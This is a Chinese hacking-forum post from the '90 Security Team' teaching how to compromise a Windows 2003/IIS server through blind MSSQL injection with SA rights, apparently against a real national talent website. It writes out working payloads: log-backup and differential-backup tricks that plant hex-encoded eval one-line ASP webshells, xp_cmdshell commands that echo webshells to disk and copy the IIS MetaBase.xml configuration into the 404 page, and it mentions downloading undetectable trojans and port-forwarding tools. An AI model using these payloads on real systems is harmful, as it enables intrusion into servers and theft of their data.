中国网络渗透测试联盟
标题:
sa权限的教程.
[打印本页]
作者:
admin
时间:
2012-9-15 14:30
标题:
sa权限的教程.
————————————————————————九零后安全技术小组 | 90 Security Team -- 打造90后网安精英团队 ———————————————————————————————
5 |2 ?2 i- W4 S6 }4 y0 R8 E
: j% a7 M3 B1 @! k; c; a0 F2 K# S
- ^! g& R9 g, _4 K/ c
欢迎高手访问指导,欢迎新手朋友交流学习。
3 s* L) X" {4 T
f/ r% Y- [% X
) A, P$ Z+ G: g7 g: \9 g
+ m/ n8 x9 |" G1 w' O
论坛:
http://www.90team.net/
/ b0 C* Y+ O1 q" v
# r0 z; { {" `
# Q# W% ]3 _0 k: J- ]) v" H
3 A. E% X! j" t J
友情检测国家人才网
' G+ n2 s# @% @. O
: ]5 N e) | L7 Y. e: K9 p
5 B' u$ w: V% B
内容:MSSQL注入SA权限不显错模式下的入侵
; _6 N& J+ l$ L/ d- c
' c9 \2 x' O% y
I6 o. K. V4 a# s5 c
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
- N& L8 e: X' ?( p4 W
' @4 c* \) ?, v. V, \* @! b
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
; f W* @' r5 W* \0 c
% c, n$ L/ ~9 {# x
( z; x: ]( d. { r
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
" e3 `0 F8 I- Z& Y4 V
- w+ l+ ?6 P. E
思路:
# t0 P6 S3 I O7 C* G2 ^0 P5 S
- m T) @2 {" }0 `
首先:
7 @/ }' R" h q' U9 v/ k* p
d" w2 W8 n4 y, L1 U0 A4 g5 O
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
3 X% b- J: h/ P
" n$ u3 ^$ G" ^) Q6 a: L
1.日志备份获得Webshell
! O- ?9 |$ r9 W$ R* @
% j/ W; \# Q& B: R- H
2.数据库差异备份获得Webshell
b, u2 `" z! S% J9 C
% E$ D! J& L) O0 t( c9 |, `2 {
4.直接下载免杀远控木马。
, `+ X4 Y' Y( p! ~6 f6 c
' P- [/ a( d0 p' F, e8 P d2 k; _
5.直接下载LCX将服务器端口转发出来
, z; `+ r1 H/ h" F0 y) k, w
! Y. T, ^* p2 I7 u4 _ _
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
' Q0 E9 E) L) A2 @/ I: o) |
+ ?+ C- n( F- V# m) s0 F
+ p/ B. t2 ]4 L) j7 r
7 N* p5 i% Y0 r7 E8 y# M
在这里我就不浪费大家时间了,我已经测试过 日志备份和 数据库差异备份 都没有成功 我就不演示了。 直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
/ q- |6 L t; @, ~5 l
7 q( r" r1 @1 T' e+ ?
我直接演示后面一个方法
3 U4 ?+ M1 d3 N! A. f$ E
8 W: L W! g7 L! |- S" O
" _3 [! Y' Y( Q# p5 b) w
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
( J: J3 _1 ^ T8 a' b' L- `
& D6 I0 h% c9 c2 l1 s/ H& ?
3 r0 W# o* d/ c: I3 U4 k+ J
% o t. }1 W; M
4 x( Y, I: @* L ~/ _
◆日志备份:
# ^# @2 K7 a) f% M2 w
0 g7 j& E# _% c& v0 O
. [' } E: _5 R; v
1. 进行初始备份
+ j2 }& k: Y' ~* G* h
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
9 ]- W. }0 X. v3 e: ]6 w9 Y* a; |( p
" d0 m5 N& m1 R) L' o. U8 z5 `5 l
2. 插入数据
% H. x- Q! A0 Z$ a
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
% q! e% |) ~$ r
$ K3 Q$ d3 u# J C# F
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E 为 一句话木马 %><%eval(request(chr(97))):response.end%>
% m8 R/ W, e6 o* V
8 D7 O8 J( f' ?0 g7 j2 w
3. 备份并获得文件,删除临时表
( D* }$ ?& ?5 V& U9 @
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
& e; F3 u9 A; Q, E+ w) V
7 U& }6 r8 R" Q1 x( y
! g Q/ Q2 O$ V0 V+ a
; g1 E- i& [$ Q: I$ s% @
◆数据库差异备份
. k$ R% C7 _: o, _2 B P9 _
. r+ y( m; |( |; F
(1. 进行差异备份准备工作
8 M! R$ s$ Y. m% D
2 D0 r. w0 | U, t" _5 t
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
; A$ J" n4 n8 l5 I% r1 h; o
! Q: l+ u: x2 u5 N: u
上面的 0x633A5C746573742E617370 是 c:\test.asp 路径转换后的16进制编码
3 }; [* x. F2 r+ z7 P! o% n
8 l" I7 P) Z. J: q
+ _7 k% z- m/ v3 O# _7 B1 X, s+ |5 }
(2. 将数据写入到数据库
* e2 Z" o# W, \% A
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
6 L/ J; Z6 `+ }
1 v1 t+ u/ z3 |/ t! W
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E 为 一句话木马 %><%eval(request(chr(97))):response.end%>
1 }$ |* `# q3 p
9 U! A2 e K. u2 W& K
3. 备份数据库并清理临时文件
6 q! C& ^( ?" H
% u# U8 p& X: n5 [! E; F- Z3 y
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
7 |# ~5 A5 A9 A, Q5 w! X
6 n# v# z# A& A" `9 u
0x633A5C746573742E617370 为 c:\test.asp 删除临时文件
* f* C: g$ v' Y
& G, t8 l: t; H! ?
) ]- a8 x8 X- d
% y( B/ t& b+ r; |
用^转义字符来写ASP(一句话木马)文件的方法:
) L8 U+ }; D. G* r4 C
) e, F; E6 d$ |& T% [; j( w0 \" }
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
) q' N9 y, J0 N6 v; y$ X4 w6 x
3 ]7 w1 ]6 N' g0 t
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
! p' g, y! w6 P# R$ Z6 i
" m D4 R; Q) K) S# T G
读取IIS配置信息获取web路径
! s6 |- v0 R: z, c( s |* Q" i
1 [; ^) x3 j4 k3 M0 T2 k$ i
4 J$ y9 |8 q! }9 E8 A$ z) u
注入点后面执行 ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
4 h7 J/ B+ l6 G6 y- J% e$ U _
8 m8 E% T ~, A6 P( D( | j& M
执行命令
! n4 ^0 P+ `$ {/ W' t. L9 [
! j3 y* v, Y& B8 i
注入点后面执行 ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
) \. g7 _, ]/ b6 ~) d- }
, Y6 `) f6 P5 `- M
8 [% V1 q) H/ W: M' @
/ x9 I7 I9 ~! d _: v+ k7 c2 n% g
9 ]5 O/ t! |7 Q
X: I, [% L3 x+ F, I! Y5 |
3 X6 D' C# S8 ], d- r
3 p. f6 h ~* L; F
+ U" U/ }9 o# H/ V& Z8 b, _
2 _8 Y1 H) E; m% c' H
7 M7 Q; ^( a5 Z4 P
4 H/ k2 U; x* E' z6 s
% i% [5 g; J" X, r/ _2 O! @, e
2 l; e! ?9 R7 r/ ?2 w
. k( [/ Y0 j/ \: [& l% G7 i
4 ~+ o5 K$ ]: U# m: ?5 }
: F! c& m; t5 T5 M# A
* v; b; T# f- u" ^
! j5 L7 v5 m: ]- p M K
0 m- b n( I& s8 Z* D
- @) j- `+ T8 G
) J4 w, d( l/ e
9 N) j8 H1 F U$ E5 C
' M* n! ~1 V; P |! }* s! B5 R
6 X& E8 b* W; Q1 F Z. i% Y# f
4 T0 b$ P/ l/ t7 b$ ^/ W( ^
% K7 f m; [' ^% s) t
; E3 d) z2 r% _/ n
. z* s( U' I- u: _ l0 _, U1 p
$ h1 c. ~0 m9 l# S( H
$ _( T8 m6 h- Q* G3 t% w
( \# T, ?$ L0 m
( E) k% W' K+ s5 x' P- O; r
f0 q6 v' C7 ]7 A2 b& P& w
0 T% F4 N* Q G4 F6 v. l& g5 S2 i
2 H# r* P) Y8 s$ {2 |& u. e
! M; N# R* p3 \4 Q; f" F Y
5 i6 h. C0 X! {# h! A
: m5 i% v" L& l: Y* ]6 I
8 j. e: G) N8 t" Z: C
4 @: k% V( C9 w- `% b
; U4 D. u; R$ t" ?4 c
# p1 k/ p# U7 p" ~ D
, J5 _$ K2 {3 | k Z6 m2 \
8 L# K0 ?% J& w U( n8 I
" ]+ Z) C9 {# l' D4 R2 S
% @. N7 C" ~8 h5 |7 X3 R
9 f( O1 E* a u0 Y
+ {9 g+ g/ [% T' e, m. z6 ]
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2